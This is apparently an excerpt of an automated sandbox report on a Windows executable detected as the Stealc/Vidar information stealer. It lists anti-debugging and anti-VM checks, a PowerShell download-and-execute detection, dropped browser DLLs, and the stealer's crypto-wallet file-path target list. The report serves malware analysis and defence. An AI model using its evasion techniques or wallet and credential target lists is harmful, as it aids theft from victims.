Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C3C1 second address: 65C410 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD000CC0C69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FD000CC0C67h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD000CC0C5Fh 0x00000019 jng 00007FD000CC0C56h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0421 second address: 52E0462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD001095A66h 0x00000009 adc cx, DA78h 0x0000000e jmp 00007FD001095A5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD001095A60h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0462 second address: 52E04A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD000CC0C66h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD000CC0C67h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E04A3 second address: 52E04A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E04A9 second address: 52E04AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E04FE second address: 52E0531 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD001095A5Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movsx ebx, cx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0531 second address: 52E0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD000CC0C60h 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD000CC0C5Eh 0x00000014 sub si, 6248h 0x00000019 jmp 00007FD000CC0C5Bh 0x0000001e popfd 0x0000001f pushad 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0575 second address: 52E059E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD001095A5Fh 0x0000000a jmp 00007FD001095A63h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E059E second address: 52E05A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E05A4 second address: 52E05A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 579F99 second address: 579F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 579F9D second address: 579FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD001095A62h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57A17D second address: 57A181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57A181 second address: 57A187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57A187 second address: 57A18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57A18D second address: 57A191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E069D second address: 52E06A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E06A3 second address: 52E06A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3C3CED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 56CD88 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3C12B6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3C3BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3C3C5C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5F9C3E instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0018D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001939B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_001939B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0018E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001943F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_001943F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0018BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0018F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00181710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00194050 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00194050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0018EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001933C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_001933C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0018DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0018DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00197970 GetSystemInfo,wsprintfA, 0_2_00197970
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: AEBKKECB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AEBKKECB.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: AEBKKECB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AEBKKECB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2266753838.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: AEBKKECB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AEBKKECB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: AEBKKECB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5~
Source: AEBKKECB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: AEBKKECB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AEBKKECB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AEBKKECB.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AEBKKECB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: AEBKKECB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AEBKKECB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AEBKKECB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AEBKKECB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: AEBKKECB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AEBKKECB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AEBKKECB.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AEBKKECB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarexC
Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: AEBKKECB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AEBKKECB.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: AEBKKECB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: AEBKKECB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C6D5FF0
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00184610 VirtualProtect ?,00000004,00000100,00000000 0_2_00184610
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00199270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00199270
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00199160 mov eax, dword ptr fs:[00000030h] 0_2_00199160
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00185000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00185000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C6AB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C6AB1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001990A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_001990A0
Source: file.exe, file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: MeProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6AB341 cpuid 0_2_6C6AB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00197630
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001963C0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_001963C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001972F0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_001972F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001974D0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_001974D0

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
